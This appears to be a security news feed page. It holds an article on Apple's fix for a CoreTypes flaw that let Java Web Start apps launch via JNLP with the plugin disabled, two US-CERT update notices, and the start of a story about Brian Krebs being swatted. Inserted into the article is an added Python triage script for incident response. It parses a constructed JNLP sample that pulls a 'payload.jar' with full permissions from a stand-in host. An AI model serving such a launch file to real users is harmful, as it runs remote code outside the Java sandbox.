Apple purges OS X flaw that let Java apps run when plugin was disabled

Apple has updated OS X to patch more than a dozen security flaws, including one that allowed attackers to exploit Web-based Java flaws even when end users had disabled the widely abused browser plugin.

The CoreTypes vulnerability in OS X Lion and Mountain Lion posed a threat because it undermined the widely repeated advice for Mac users to disable Java in their browsers. That advice is meant to repel a surge of attacks that exploit vulnerabilities in the Oracle-controlled software; criminal hackers use those flaws to surreptitiously install malware when a computer visits a booby-trapped website. According to a bulletin accompanying Thursday's OS X update, attackers could bypass the protective measure through the Java Network Launching Protocol (JNLP), the mechanism that lets a web page hand a Java Web Start application to the Java runtime, which then launches it outside the browser plug-in.

"Visiting a maliciously crafted website could allow a Java Web Start application to be launched automatically even if the Java plug-in is disabled," the bulletin explained. "Java Web Start applications would run even if the Java plug-in was disabled. This issue was addressed by removing JNLP files from the CoreTypes safe file type list, so the Web Start application will not be run unless the user opens it in the Downloads directory."
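The fix above hinges on what a JNLP file is: a small XML document that names a remote codebase, the JAR files to download from it, the class to run, and the permissions the application wants. The following triage script is an added example, not code from the article or from Apple. It parses a constructed, hypothetical JNLP file and reports what Java Web Start would fetch and execute if the file were launched automatically, which is exactly the behaviour the CoreTypes change stops; a responder recovering such a file from a user's Downloads directory could use the same extraction to scope an incident.

```python
"""Triage a Java Web Start (JNLP) file: report what it would fetch and run.

Added example, not from the article or from Apple. The JNLP below is a
constructed sample; the host example.invalid and all names in it are made up.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlsplit

# Constructed sample of a JNLP file as a booby-trapped page might serve it.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="http://example.invalid/apps/" href="update.jnlp">
  <information>
    <title>Player Update</title>
    <vendor>Example Vendor</vendor>
  </information>
  <security>
    <all-permissions/>
  </security>
  <resources>
    <j2se version="1.6+"/>
    <jar href="loader.jar" main="true"/>
    <jar href="lib/payload.jar"/>
  </resources>
  <application-desc main-class="com.example.Loader">
    <argument>-s</argument>
  </application-desc>
</jnlp>
"""


def triage_jnlp(data: bytes) -> dict:
    """Extract the launch-relevant facts from a JNLP document.

    For untrusted files in production, parse with defusedxml instead of the
    standard library to avoid entity-expansion tricks; the format handling
    below is the same either way.
    """
    root = ET.fromstring(data)
    if root.tag != "jnlp":
        raise ValueError("not a JNLP document")

    # Relative jar hrefs are resolved against the codebase, as Web Start does.
    codebase = root.get("codebase", "")
    jar_elems = list(root.iter("jar"))
    jars = [urljoin(codebase, j.get("href", "")) for j in jar_elems]
    main_jar = next(
        (urljoin(codebase, j.get("href", "")) for j in jar_elems if j.get("main") == "true"),
        jars[0] if jars else None,  # first jar is the default entry point
    )

    # Either an application or an applet descriptor names the entry class.
    desc = root.find("application-desc")
    if desc is None:
        desc = root.find("applet-desc")
    main_class = desc.get("main-class") if desc is not None else None

    # <all-permissions/> asks to run outside the Java sandbox (full user rights).
    all_permissions = root.find("security/all-permissions") is not None

    warnings = []
    if all_permissions:
        warnings.append("requests all-permissions (runs outside the Java sandbox)")
    if urlsplit(codebase).scheme != "https":
        warnings.append("codebase is not https")
    hosts = {urlsplit(u).netloc for u in jars}
    if len(hosts) > 1:
        warnings.append("jars are pulled from more than one host")

    return {
        "title": root.findtext("information/title", default=""),
        "codebase": codebase,
        "jars": jars,
        "main_jar": main_jar,
        "main_class": main_class,
        "all_permissions": all_permissions,
        "warnings": warnings,
    }


if __name__ == "__main__":
    for key, value in triage_jnlp(SAMPLE_JNLP).items():
        print(f"{key}: {value}")
```

The point of the "all-permissions" check is that a Web Start application granted it is not confined by the Java sandbox at all; combined with automatic launch from a web page, that is the attack the bulletin describes, and it is why a downloaded .jnlp now requires the user to open it deliberately.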

Apple Releases OS X v10.8.3 and Security Update 2013-001

Original release date: March 15, 2013

Apple has released OS X v10.8.3 and Security Update 2013-001 to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code, bypass authentication, leverage additional attacks, cause a denial-of-service condition or obtain sensitive information.

US-CERT encourages users and administrators to review Apple Security article HT5672 and apply any necessary updates to help mitigate the risks.


This product is provided subject to this Notification and this Privacy & Use policy.


Apple Releases Security Updates for Safari on OS X

Original release date: March 15, 2013

Apple has released Safari 6.0.3, which updates WebKit, to address multiple vulnerabilities. These vulnerabilities could allow a remote attacker to execute arbitrary code or conduct a cross-site scripting attack.

Safari 6.0.3 is available for the following versions:

  • OS X Lion v10.7.5
  • OS X Lion Server v10.7.5
  • OS X Mountain Lion v10.8.2

US-CERT encourages users and administrators to review Apple Support Article HT5671 and follow best-practice security policies to determine if their organization is affected and the appropriate response.



Security reporter tells Ars about hacked 911 call that sent SWAT team to his house (Updated)

Update: Krebs has now written about his experience in some detail. The same people responsible for the DDoS attack carried out yesterday on Krebs' site launched a similar attack on Ars Technica this morning.

Original story:

Brian Krebs has always been a trailblazer among security reporters. His exposés completely shut down a California hosting service that coddled spammers and child pornographers and severely disrupted an organized crime syndicate known as Russian Business Network. More recently, his investigative journalism has followed the money to the people who sell malware exploit kits, illicitly procured credit reports, and denial-of-service services in underground forums.